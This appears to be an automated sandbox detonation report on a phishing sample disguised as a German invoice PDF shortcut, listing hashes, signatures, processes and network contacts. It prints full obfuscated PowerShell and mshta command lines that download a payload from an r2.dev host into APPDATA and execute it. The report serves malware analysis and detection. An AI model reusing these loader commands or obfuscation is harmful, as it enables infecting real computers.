C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\dcfa
| MD5 | 456596683dad1217c76d8c0f47b5cfbc |
| SHA1 | 001ae3f937aa75ad2175289c6e8f09561a1cbb35 |
| SHA256 | a7e578d0f7a5d522e4b4e62864f77cbb1830dc7e7026c9ee0b5f6fa7156c727f |
| SHA512 | 537420007a4985f2deb4b2a48af1ba61cf8cc112359ec1cdbd02dfb8e958ab5ab4ec302cd0698a14d4560afe6c23627d1d4d080eac9daa7cb5edc7259cb73591 |
memory/2440-92-0x00007FFD6BAC0000-0x00007FFD6BC32000-memory.dmp
memory/3884-128-0x00007FFD6BAB0000-0x00007FFD6BFFE000-memory.dmp
memory/3884-131-0x00007FFD6B930000-0x00007FFD6BAA2000-memory.dmp
memory/3884-132-0x00007FFD6B930000-0x00007FFD6BAA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5c781e1d
| MD5 | dd0bb39708cd97244d6a552c23625c49 |
| SHA1 | accd09b720f006089a28ff751cc23bdeb2dd195d |
| SHA256 | 7e48e05a11ae7a6ecc779d44be5930cdc62066f83d131990c4276102667967c1 |
| SHA512 | 5ea12d63a8a849ce46b2b86848570bb2f97c7036da327812d9b81d3c61f5da2eed2f851aa5b422852aed9d807ae219b7280bfeab8cff4ca4cc398eecb441c4d0 |
memory/1368-135-0x00007FFD8B850000-0x00007FFD8BA45000-memory.dmp
memory/1368-138-0x00000000757D0000-0x000000007594B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
| MD5 | 967f4470627f823f4d7981e511c9824f |
| SHA1 | 416501b096df80ddc49f4144c3832cf2cadb9cb2 |
| SHA256 | b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91 |
| SHA512 | 8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c |
memory/4312-145-0x00007FF67C8E0000-0x00007FF67CBC6000-memory.dmp
memory/4312-146-0x00007FF67C8E0000-0x00007FF67CBC6000-memory.dmp
memory/4312-147-0x00007FF67C8E0000-0x00007FF67CBC6000-memory.dmp
memory/4312-154-0x00007FF67C8E0000-0x00007FF67CBC6000-memory.dmp
memory/4312-155-0x00007FF67C8E0000-0x00007FF67CBC6000-memory.dmp
memory/4312-159-0x00007FF67C8E0000-0x00007FF67CBC6000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win7-20240903-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\system32\mshta.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\system32\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0094.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.157:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
Files
memory/2568-38-0x000007FEF58DE000-0x000007FEF58DF000-memory.dmp
memory/2568-39-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
memory/2568-40-0x0000000001FB0000-0x0000000001FB8000-memory.dmp
memory/2568-42-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2568-41-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2568-44-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2568-43-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/2568-45-0x000007FEF5620000-0x000007FEF5FBD000-memory.dmp
memory/3060-63-0x000000001B7E0000-0x000000001BAC2000-memory.dmp
memory/3060-64-0x00000000003F0000-0x00000000003F8000-memory.dmp